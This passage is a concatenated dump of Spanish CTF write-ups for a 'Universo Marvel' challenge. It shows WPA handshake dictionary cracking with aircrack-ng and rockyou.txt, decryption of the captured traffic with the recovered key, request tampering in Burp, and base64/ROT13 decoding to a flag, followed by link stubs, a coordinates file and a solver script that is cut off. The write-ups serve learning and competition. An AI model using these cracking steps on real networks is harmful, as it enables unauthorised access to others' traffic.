 89 | Intentamos desencriptarlos/decodearlos sin éxito, todas las combinaciones de BAS/VIG/ROT/XOR que se nos ocurren... Pasa mucho tiempo intentando en cyberchef varios valores, con tipos de encode y encriptación de pasadas UAM.
 90 | 
 91 | Luego empezamos a ver las peticiones en el BURP y vamos probando a modificar peticiones, ya que la búsqueda de la codificación era bastante infructuosa.
 92 | 
 93 | Después de varias pruebas llegamos a la definitiva:
 94 | Quitamos el PHPSESSID con el burp mientras hacemos la petición de la Ubicación de la base.
 95 | Devuelve este resultado(yuhu!):
 96 | eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
 97 | 
 98 | El = al final nos hace pensar que es base64
 99 | Nos vamos a cyberchef y descodificamos base64:
100 | https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)&input=ZXlKSWIzWndibkIyWW1GeVppSTZJSHNLQ1NBZ0lDQWlUMjVtY2lCRFpYWmhjSFpqYm5raU9pQjdJQW9KSUNBZ0lDQWdJQ0FpUVdKNmIyVnlJam9nSWxabWVXNGdWV3h4Wlc0aUxBb0pJQ0FnSUNBZ0lDQWlVR0ppWlhGbUlqb2dJak0zd3JBeU1lS0Fza0VnTWpQQ3NESTQ0b0N5VWlJc0Nna2dJQ0FnZlN3S0NTQWdJQ0FpVDI1bWNpQkdjbkJsY21kdUlqb2dld29KSUNBZ0lDQWdJQ0FpUVdKNmIyVnlJam9nSWxONWJuUWlMQW9KSUNBZ0lDQWdJQ0FpVUdKaVpYRm1Jam9nSWtoT1duczBOamcyTTNFNU1qZzFPRzgwT0Rad01qbHpOelU1TnpZM2NqVXpjamt5YzMwaUxBb0pJQ0FnSUgwS0NYMD0
101 | {"Hovpnpvbarf": {
102 | 	    "Onfr Cevapvcny": { 
103 | 	        "Abzoer": "Vfyn Ulqen",
104 | 	        "Pbbeqf": "37°21′A 23°28′R",
105 | 	    },
106 | 	    "Onfr Frpergn": {
107 | 	        "Abzoer": "Synt",
108 | 	        "Pbbeqf": "HNZ{46863q92858o486p29s759767r53r92s}",
109 | 	    }
110 | 	}
111 | 
112 | Usamos un ROT13 sobre el string que parece una flag (y que de otras UAM nos suena HNZ rot13 de UAM)
113 | https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,13)&input=SE5aezQ2ODYzcTkyODU4bzQ4NnAyOXM3NTk3NjdyNTNyOTJzfQ
114 | 
115 | Hacemos ROT13 sobre todo el texto:
116 | https://gchq.github.io/CyberChef/#recipe=ROT13(true,true,13)&input=eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0
117 | {"Ubicaciones": {
118 | 	    "Base Principal": { 
119 | 	        "Nombre": "Isla Hydra",
120 | 	        "Coords": "37°21′N 23°28′E",
121 | 	    },
122 | 	    "Base Secreta": {
123 | 	        "Nombre": "Flag",
124 | 	        "Coords": "UAM{46863d92858b486c29f759767e53e92f}",
125 | 	    }
126 | 	}
127 | 
128 | Metemos la flag en el portal, segundo puesto! =)
129 | Esperamos a la segunda parte!!
130 | 
131 | Gracias a los admin por la prueba, y enhorabuena a todos los que han pasado la prueba.
132 | masi.
133 | 
134 | -------------------------------------------------------------------------------
135 | -------------------------------------------------------------------------------
136 | WRITE-UP 2018-12-19 EOF.
137 | -------------------------------------------------------------------------------
138 | -------------------------------------------------------------------------------


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/nachinho3/nachinho3-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/nachinho3/nachinho3-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/oreos/oreos-episodio1.docx:
--------------------------------------------------------------------------------
  1 | UNA AL MES (Diciembre 2018)
  2 | **************************************************************************
  3 | 
  4 | Categoría: Universo Marvel
  5 | Episodio: 1
  6 | 
  7 | --------------------------------------------------------------------------
  8 | 
  9 | 1. Descargamos el fichero pcap de google drive (https://drive.google.com/open?id=1ltE42DQvMe-q_qVBbgeKQXvvTEiRyhwq)
 10 | 
 11 | 2. Observamos tráfico wireless 802.11. Buscamos un WPA-handshake con la herramienta aircrack-ng:
 12 | 
 13 | oreos# aircrack-ng capture-01.cap 
 14 | Opening capture-01.cap
 15 | Read 5786 packets.
 16 | 
 17 |    #  BSSID              ESSID                     Encryption
 18 | 
 19 |    1  E0:91:53:45:EA:DD  Hydra Corp                WPA (1 handshake)
 20 | 
 21 | Choosing first network as target.
 22 | 
 23 | Opening capture-01.cap
 24 | Please specify a dictionary (option -w).
 25 | 
 26 | 
 27 | Quitting aircrack-ng...
 28 | 
 29 | 3. Existe un WPA-handshake para el SSID "Hydra Corp" con BSSID "E0:91:53:45:EA:DD". Realizaremos un ataque de diccionario usando rockyou.txt. Se intuye que la clave se encontrará al final del diccionario, por lo que le damos la vuelta usando la herramienta 'tac':
 30 | 
 31 | oreos# tac rockyou.txt > rockyou-rev.txt
 32 | 
 33 | Lanzamos el ataque de diccionario con aircrack-ng:
 34 | 
 35 | oreos# ircrack-ng -w rockyou-rev.txt -b E0:91:53:45:EA:DD capture-01.cap
 36 | 
 37 |       [00:14:17] 4868840/9822768 keys tested (5786.68 k/s) 
 38 | 
 39 |       Time left: 14 minutes, 16 seconds                         49.57%
 40 | 
 41 |                           KEY FOUND! [ hydra54321 ]
 42 | 
 43 | 
 44 |       Master Key     : 7F B1 AE 7F BB F1 A7 AF 5E D5 1B D3 17 1F E7 61 
 45 |                        9C 5F 54 58 44 CD 57 5C A8 B8 B0 0E F6 1E 3B 62 
 46 | 
 47 |       Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 48 |                        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 49 |                        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 50 |                        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
 51 | 
 52 |       EAPOL HMAC     : 8D 07 1F AA BB 62 2B 05 41 A2 82 60 33 80 DA 16
 53 | 
 54 | Encontramos la clave, 'hydra54321'.
 55 | 
 56 | 4. Obtenemos el PSK a partir de SSID y el passphrase con la siguiente herramienta online, para desencriptar el tráfico en wireshark (https://www.wireshark.org/tools/wpa-psk.html)
 57 | 
 58 | Passphrase: hydra54321
 59 | SSID: Hydra Corp
 60 | PSK: 7fb1ae7fbbf1a7af5ed51bd3171fe7619c5f545844cd575ca8b8b00ef61e3b62
 61 | 
 62 | 5. Insertamos el PSK en wireshark (Edit -> Preferences -> Protocols > 802.11):
 63 | 
 64 | wpa-psk - 7fb1ae7fbbf1a7af5ed51bd3171fe7619c5f545844cd575ca8b8b00ef61e3b62
 65 | 
 66 | 6. Filtramos el tráfico 'http', y observamos accesos a una URL web a atacar.
 67 | 
 68 | 7. Tras rastrear la web, encontramos un enlace que nos generará la ubicación de la Isla Hydra: http://34.247.69.86/universomarvel/episodio1/databases.php?load=NVQXAYLT
 69 | 
 70 | Probamos a descargarla con 'curl' y observamos una cadena codificada en Base64.
 71 | 
 72 | oreos# curl http://34.247.69.86/universomarvel/episodio1/databases.php?load=NVQXAYLT 
 73 | 
 74 | eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
 75 | 
 76 | 8. Usaremos la herramienta 'autodecoder' para decodificar/desencriptar el mensaje:
 77 | 
 78 | oreos# git clone https://github.com/oreosES/autodecoder.git
 79 | oreos# python3 audodecoder.py -m eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0= -l 2
 80 | 
 81 | 
 82 |                           (                                     
 83 |    (             (        )\ )                  (               
 84 |    )\       (    )\ )    (()/(     (            )\ )   (   (    
 85 | ((((_)(    ))\  (()/(  (  /(_))   ))\  (   (   (()/(  ))\  )(   
 86 |  )\ _ )\  /((_)  ((_)) )\(_))_   /((_) )\  )\   ((_))/((_)(()\  
 87 |  (_)_\(_)(_))(   _| | ((_)|   \ (_))  ((_)((_)  _| |(_))   ((_) 
 88 |   / _ \  | || |/ _` |/ _ \| |) |/ -_)/ _|/ _ \/ _` |/ -_) | '_| 
 89 |  /_/ \_\  \_,_|\__,_|\___/|___/ \___|\__|\___/\__,_|\___| |_|   
 90 | 
 91 |                     Author: oreos | Twitter: @oreos_ES
 92 | 
 93 | 
 94 | base64 > atbash: SLEKMKEYZIULMUIXVEZKEXMBZYALVIEUBMFOJVMKYYVJUZILMUIUIKVITMZYALVIHBMGKYYVJUSMAJLKHIIH
 95 | base64 > baconian: RZ
 96 | base64 > caesar: {"KXEYWYEKJAO": {
 97 | 	    "RWOA FNEJYELWH": { 
 98 | 	        "DKIXNA": "YOHW XU@NW",
 99 | 	        "SKKN@O": "37°21′D 23°28′U",
100 | 	    },
101 | 	    "RWOA IAYNAPW": {
102 | 	        "DKIXNA": "VHWC",
103 | 	        "SKKN@O": "KQC{46863@92858X486Y29B759767A53A92B}",
104 | 	    }
105 | 	}
106 | base64 > rot13: {"Ubicaciones": {
107 | 	    "Base Principal": { 
108 | 	        "Nombre": "Isla Hydra",
109 | 	        "Coords": "37°21′N 23°28′E",
110 | 	    },
111 | 	    "Base Secreta": {
112 | 	        "Nombre": "Flag",
113 | 	        "Coords": "UAM{46863d92858b486c29f759767e53e92f}",
114 | 	    }
115 | 	}
116 | base64 > rot47: LQw@GA?AG32C7Qi L
117 | 	    Q~?7C r6G2AG4?JQi L 
118 | 	        Qp3K@6CQi Q'7J? &=B6?Q[
119 | 	        Q!336B7Qi Qbf°a`′p ab°ag′#Q[
120 | 	    N[
121 | 	    Q~?7C uCA6C8?Qi L
122 | 	        Qp3K@6CQi Q$J?EQ[
123 | 	        Q!336B7Qi Qw}+LcegebBhagdg@cgeAahDfdhfefCdbChaDNQ[
124 | 	    N
125 | 	N
126 | atbash > atbash: EYJIBZWBNBYMFYZIIIHSKCSAGICAITMCIBDZXZHCHZJBNKIOIBIAOJICAGICAGICAIQWJBVYIJOGILZMEWGVWXXZWILAOJICAGICAGICAIUGJIZXFMIJOGIJMWRAYMEKASKEGMJPCSDIOCYUIISCGKGICAGFSWKCSAGICAITMCIBGCNBLCMDUIJOGEWOJICAGICAGICAIQWJBVYIJOGILNBNQILAOJICAGICAGICAIUGJIZXFMIJOGIKHOWNSNJGMEMJGOGODZWMJLZNZUNZYCJUZCJKYCILAOJICAGIHKCX
127 | atbash > baconian: WCHA
128 | atbash > caesar: YETUBDGBPBEQXEDUUUVKSAKCWUACUJQAUBZDFDVAVDTBPSUOUBUCOTUACWUACWUACUMGTBHEUTOWURDQYGWHGFFDGURCOTUACWUACWUACUIWTUDFXQUTOWUTQGLCEQYSCKSYWQTNAKZUOAEIUUKAWSWUACWXKGSAKCWUACUJQAUBWAPBRAQZIUTOWYGOTUACWUACWUACUMGTBHEUTOWURPBPMURCOTUACWUACWUACUIWTUDFXQUTOWUSVOGPKPTWQYQTWOWOZDGQTRDPDIPDEATIDATSEAURCOTUACWUVSAF
129 | atbash > rot13: IODELNQLZLOAHONEEEFUCKUMGEKMETAKELJNPNFKFNDLZCEYELEMYDEKMGEKMGEKMEWQDLROEDYGEBNAIQGRQPPNQEBMYDEKMGEKMGEKMESGDENPHAEDYGEDAQVMOAICMUCIGADXKUJEYKOSEEUKGCGEKMGHUQCKUMGEKMETAKELGKZLBKAJSEDYGIQYDEKMGEKMGEKMEWQDLROEDYGEBZLZWEBMYDEKMGEKMGEKMESGDENPHAEDYGECFYQZUZDGAIADGYGYJNQADBNZNSZNOKDSNKDCOKEBMYDEKMGEFCKP
130 | atbash > rot47: 'q"#*ps*|*q}&qp###$w!)w+%#)+#v})#*(prp$)$p"*|!#{#*#+{"#)+%#)+%#)+#ys"*tq#"{%#~p}'s%tsrrps#~+{"#)+%#)+%#)+#u%"#pr&}#"{%#"}sx+q}'!+w!'%}"z)w(#{)qu##w)%!%#)+%&ws!)w+%#)+#v})#*%)|*~)}(u#"{%'s{"#)+%#)+%#)+#ys"*tq#"{%#~|*|y#~+{"#)+%#)+%#)+#u%"#pr&}#"{%#!${s|w|"%}'}"%{%{(ps}"~p|pu|pq)"up)"!q)#~+{"#)+%#$!)r
131 | baconian > atbash: VZTTZ
132 | baconian > caesar:   HDJJD
133 | baconian > rot13:   RNTTN
134 | baconian > rot47:   tpvvp
135 | caesar > atbash: MSNOPXUPDVYERSXIOOPYMUEWKOUWIDEOIVTXZXJOPXHPDGIIIVOWCNOUWKOUWKOUWIGANPBSOHCKOFXEMAKBATTXAILWCNOUWKOUWKOUWICQNIXZREOHCKOHKUZWSKMMWYGSKKHHUYTOCUSCIOYUKGKOUWKLEUMUEWKOUWIDEOIVQODVFOENWOHCKMUCNOUWKOUWKOUWIGANPBSOHCKOFJPDGILWCNOUWKOUWKOUWICQNIXZREOHCKOGJIADYJHKKSKHKIQITXUKHFRJRCJRYOHCROHGSOILWCNOUWKOPMUZ
136 | caesar > baconian: Y 
137 | caesar > caesar: QKPON3FINZH2EYLKFUO6ONEQIYGSOIGUZ25YOUHJFDFTONFVNZWUUUH7OGAPOIGSOIGSOIGUWCP6N2BKOVASOXFYQC4SBCJJFC4URGAPOIGSOIGSOIGUAMPUFDLYOVASOVS3IDGKSQQGEWKSSVVIEJO44AIKAUOEISWSOIGSRYIQIYGSOIGUZ25YOUHMOZHXOYPGOVASQIAPOIGSOIGSOIGUWCP6N2BKOVASOXT5NZWURGAPOIGSOIGSOIGUAMPUFDLYOVASOWTUCZE0TVS2S3K5SVS1UM80UJFISVXLTLA5TLE3OVALOVWKO30URGAPOIGSON0QID0=
138 | caesar > rot13: AUZYX3PSXJR2OIVUPEY6YXOASIQCYSQEJ25IYERTPNPDYXPFXJGEEER7YQKZYSQCYSQCYSQEGMZ6X2LUYFKCYHPIAM4CLMTTPM4EBQKZYSQCYSQCYSQEKWZEPNVIYFKCYFC3SNQUCAAQOGUCCFFSOTY44KSUKEYOSCGCYSQCBISASIQCYSQEJ25IYERWYJRHYIZQYFKCASKZYSQCYSQCYSQEGMZ6X2LUYFKCYHD5XJGEBQKZYSQCYSQCYSQEKWZEPNVIYFKCYGDEMJO0DFC2C3U5CFC1EW80ETPSCFHVDVK5DVO3YFKVYFGUY30EBQKZYSQCYX0ASN0=
139 | caesar > rot47: }w|{zbruz(taq'xwr#{e{zq}u's!{us#(ad'{#tvrpr"{zr$z(%###tf{s)|{us!{us!{us#%+|eza*w{$)!{&r'}+c!*+vvr+c#~s)|{us!{us!{us#)y|#rpx'{$)!{$!bupsw!}}sq%w!!$$uqv{cc)uw)#{qu!%!{us!~'u}u's!{us#(ad'{#ty{(t&{'|s{$)!}u)|{us!{us!{us#%+|eza*w{$)!{&"dz(%#~s)|{us!{us!{us#)y|#rpx'{$)!{%"#+(q_"$!a!bwd!$!`#yg_#vru!$&x"x)d"xqb{$)x{$%w{b_#~s)|{us!{z_}up_l
140 | rot13 > atbash: IODELNQLZLOAHONEEEFUCKUMGEKMETAKELJNPNFKFNDLZCEYELEMYDEKMGEKMGEKMEWQDLROEDYGEBNAIQGRQPPNQEBMYDEKMGEKMGEKMESGDENPHAEDYGEDAQVMOAICMUCIGADXKUJEYKOSEEUKGCGEKMGHUQCKUMGEKMETAKELGKZLBKAJSEDYGIQYDEKMGEKMGEKMEWQDLROEDYGEBZLZWEBMYDEKMGEKMGEKMESGDENPHAEDYGECFYQZUZDGAIADGYGYJNQADBNZNSZNOKDSNKDCOKEBMYDEKMGEFCKP
141 | rot13 > baconian: H ZZ
142 | rot13 > caesar: AUZYX3PSXJR2OIVUPEY6YXOASIQCYSQEJ25IYERTPNPDYXPFXJGEEER7YQKZYSQCYSQCYSQEGMZ6X2LUYFKCYHPIAM4CLMTTPM4EBQKZYSQCYSQCYSQEKWZEPNVIYFKCYFC3SNQUCAAQOGUCCFFSOTY44KSUKEYOSCGCYSQCBISASIQCYSQEJ25IYERWYJRHYI@QYFKCASKZYSQCYSQCYSQEGMZ6X2LUYFKCYHD5XJGEBQKZYSQCYSQCYSQEKWZEPNVIYFKCYGDEMJO0DFC2C3U5CFC1EW80ETPSCFHVDVK5DVO3YFKVYFGUY30EBQKZYSQCYX0ASN0=
143 | rot13 > rot13: eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
144 | rot13 > rot47: C=('@b|;@2~a{K$=|G'e'&7)!u}E'!}GvadKAG~"|z|FA&|H@2IGqG~f'}3('!}E'!}E'!}Gsy(e@ax='H3E'J|KCycExy<<|ycG*}3('!}E'!}E'!}Gw%(G|z$K'H3E'H+b;6}=+C)}7I#E+Hr!7"'cc3!=wG'7!EIE'!}EDu;)!u}E'!}GvadKAG~%A2~JAKB9'H3EC;3('!}E'!}E'!}Gsy(e@ax='H3E'Jpd@2sG*}3('!}E'!}E'!}Gw%(G|z$K'H3E'IFqy27_pHEa+b#d+HE`q%g_q"|;+HJ>p>wdp>{bAHw>AHI=Ab_G*}3('!}E'&_)!z_l
145 | rot47 > atbash: QBCYSJZFQCVCDWAIKCIKZWJHDJUCKBCIKCIKCIKBVZQCCXRRXKBCIKCIKCIKEBFCCYSXKQAKWGIWHCXXIQCWICIKSAIKCIKZWJEJUCSBCIKCIKCIKBVZQCCWKBCIKCIKCIKEBFCCWZYGWETHSPPWPYPQYKBCIKCDAIO
146 | rot47 > baconian: RD
147 | rot47 > caesar: 6MHG3K+K3?@J*>DM+:GNGFGIA$Y8GAY:%JM>4:@B+)+94F+;3?<:~:@OGY@HGAY8GAY8GAY:"(HN3J'MG;@8G=+>6(L8'(LL+(L:{Y@HGAY8GAY8GAY:&EH:+)D>G;@8G;|KKFYM|6IYG<C8|;!AGBGLL@AM&:GGA8<8GAY87$KIA$Y8GAY:%JM>4:@E4?@=4>5IG;@86K@HGAY8GAY8GAY:"(HN3J'MG;@8G=}M3?":{Y@HGAY8GAY8GAY:&EH:+)D>G;@8G<9~(?G_};8J|KCM|;8`~EP_~B+K|;=N}N&M}N*K4;&N4;<M4K_:{Y@HGAY8GF_IA)_U
148 | rot47 > rot13: 6Wlk3o+U3?dn*>hW+:krkjQme$c8kec:%nq>4:df+)+94j+;3?<:~:dskc@lkec8kec8kec:"(lr3n'Wk;@8k=+>6(p8'(VV+(p:{c@lkec8kec8kec:&il:+)h>k;@8k;|oUPcW|6mcQ<g8|;!eQfkpp@eW&:kQe8<8kec87$Ume$c8kec:%nq>4:di4?d=4>5Sk;@86U@lkec8kec8kec:"(lr3n'Wk;@8k=}q3?":{c@lkec8kec8kec:&il:+)h>k;@8k<9~(?Q_};8n|ogq|;8`~it_~f+U|;=X}X&q}X*o4;&X4;<W4o_:{c@lkec8kj_me)_y
149 | rot47 > rot47: eyJIb3ZwbnB2YmFyZiI6IHsKCSAgICAiT25mciBDZXZhcHZjbnkiOiB7IAoJICAgICAgICAiQWJ6b2VyIjogIlZmeW4gVWxxZW4iLAoJICAgICAgICAiUGJiZXFmIjogIjM3wrAyMeKAskEgMjPCsDI44oCyUiIsCgkgICAgfSwKCSAgICAiT25mciBGcnBlcmduIjogewoJICAgICAgICAiQWJ6b2VyIjogIlN5bnQiLAoJICAgICAgICAiUGJiZXFmIjogIkhOWns0Njg2M3E5Mjg1OG80ODZwMjlzNzU5NzY3cjUzcjkyc30iLAoJICAgIH0KCX0=
150 | 
151 | 9. La combinación 'base64 > rot13' nos muestra la flag:
152 | 
153 | UAM{46863d92858b486c29f759767e53e92f} 
154 | 


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/rafamartos/rafamartos-episodio1.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/rafamartos/rafamartos-episodio1.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio1/victormanuelleyva/victormanuelleyva-episodio1.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio1/victormanuelleyva/victormanuelleyva-episodio1.txt


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/arsenics/arsenics-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/arsenics/arsenics-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/asterixco/asterixco-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/asterixco/asterixco-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/bicacaro/bicacaro-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/bicacaro/bicacaro-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/darkeagle/darkeagle-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/darkeagle/darkeagle-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio2/julianjm/julianjm-episodio2.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio2/julianjm/julianjm-episodio2.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/arsenics/arsenics-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/arsenics/arsenics-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/bechma/bechma-episdio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/bechma/bechma-episdio3.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/bicacaro/bicacaro-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/bicacaro/bicacaro-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/darkeagle/coordenades.txt:
--------------------------------------------------------------------------------
 1 | -51.2263816202, 8.10899805433
 2 | -3.396936473, 7.87198824054
 3 | 45.1590246548, 7.93243330727
 4 | 45.7384951953, -73.2066721802
 5 | -3.42714386964, -72.9107266853
 6 | -2.77172800229, 7.52185701112
 7 | 19.1399952, -72.3570972
 8 | 44.5607307927, -73.0205921546
 9 | 43.6100611723, 6.58946301884
10 | -2.73141067245, 8.27764655993
11 | -50.3213413202, 7.07393246568
12 | -51.2758314025, -73.091160021
13 | -2.47453022387, -72.4698275544
14 | 44.2979255136, -72.4873645117
15 | 19.1399952, -72.3570972
16 | -50.505288471, 7.6154200698
17 | -2.77032857828, 8.45085972386
18 | 43.3953722545, 7.12287052714
19 | 45.8072900754, -73.1907339308
20 | -2.95197936965, -72.2507948297
21 | -3.37159885987, 7.61851969812
22 | 19.1399952, -72.3570972
23 | 44.9471915554, -71.7312374845
24 | 43.434079994, 7.05564264826
25 | -3.77755921359, 7.3140029803
26 | -2.1765448219, -72.9980908924
27 | 45.5157039055, -72.0750205454
28 | -2.6665636247, -71.758301384
29 | -52.4282156352, -73.7745944789
30 | -50.711316091, 8.37083156669
31 | -2.51838084051, 7.54880895033
32 | 19.1399952, -72.3570972
33 | 45.0778663225, -72.5092560673
34 | -3.09237153981, -71.5875397405
35 | -2.54013043815, 8.29075062273
36 | -51.2650141235, 7.38182033986
37 | -51.3843804847, -72.6927837569
38 | -3.47113449173, -73.2910711802
39 | 19.1399952, -72.3570972
40 | 43.951979572, 7.34734479231
41 | 45.0774665767, -72.6653555968
42 | -1.64013868935, -71.880258046
43 | -2.5651543193, 7.15699499792
44 | -51.1302541808, 6.61409584651
45 | -51.6645314915, -72.2889667536
46 | 19.1399952, -72.3570972
47 | -50.9537618541, 7.86695357465
48 | -3.39854486395, 7.54749242771
49 | 44.1875549665, 8.41825012463
50 | 44.5392940445, -72.5272725636
51 | -2.11328803913, -71.5479514771
52 | -3.68109586997, 8.3987557492
53 | 19.1399952, -72.3570972
54 | -50.3640122893, 7.42600497636
55 | -3.20207550584, 8.67050872668
56 | 43.7000729441, 6.93679182633
57 | 45.0580573149, -71.7938069637
58 | -3.31919012843, -72.2350798982
59 | -3.46384596989, 8.17271197177
60 | 19.1399952, -72.3570972
61 | 44.2842879927, -72.7735510253
62 | -3.32885065011, -73.176847501
63 | -2.4505637663, 7.42942648896
64 | 44.4455780729, 8.40633450195
65 | -2.42629846443, 8.67464696509
66 | -51.6986157517, 6.67583285244
67 | 19.1399952, -72.3570972
68 | 44.6513902796, 8.20328564618
69 | -3.53964840101, 7.99538219466
70 | -51.2036099499, 6.99221399195
71 | 19.1399952, -72.3570972


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/darkeagle/darkeagle-episodio3.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devploit/unaalmes-writeups/77c2db623e4031192315ace9167f54392a1d1f31/writeups/universomarvel/episodio3/darkeagle/darkeagle-episodio3.pdf


--------------------------------------------------------------------------------
/writeups/universomarvel/episodio3/darkeagle/solve_final.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | from gmplot import gmplot
 3 | import csv
 4 | import sys
 5 | # Us: python solve_final.py fitxer_coordenades.txt
 6 | 
 7 | def banner():
 8 |     print("\n\
 9 |                                                                                                                                         \n\
10 |   /$$$$$$                            /$$$$$$$                                                      /$$                        		\n\
11 |  /$$__  $$                          | $$__  $$                                                    | $$                        		\n\
12 | | $$  \__/  /$$$$$$   /$$$$$$       | $$  \ $$  /$$$$$$   /$$$$$$$  /$$$$$$  /$$   /$$  /$$$$$$  /$$$$$$    /$$$$$$   /$$$$$$ 		\n\
13 | | $$ /$$$$ /$$__  $$ /$$__  $$      | $$  | $$ /$$__  $$ /$$_____/ /$$__  $$| $$  | $$ /$$__  $$|_  $$_/   /$$__  $$ /$$__  $$		\n\
14 | | $$|_  $$| $$$$$$$$| $$  \ $$      | $$  | $$| $$$$$$$$| $$      | $$  \__/| $$  | $$| $$  \ $$  | $$    | $$$$$$$$| $$  \__/		\n\
15 | | $$  \ $$| $$_____/| $$  | $$      | $$  | $$| $$_____/| $$      | $$      | $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      		\n\
16 | |  $$$$$$/|  $$$$$$$|  $$$$$$/      | $$$$$$$/|  $$$$$$$|  $$$$$$$| $$      |  $$$$$$$| $$$$$$$/  |  $$$$/|  $$$$$$$| $$      		\n\
17 |  \______/  \_______/ \______/       |_______/  \_______/ \_______/|__/       \____  $$| $$____/    \___/   \_______/|__/      		\n\
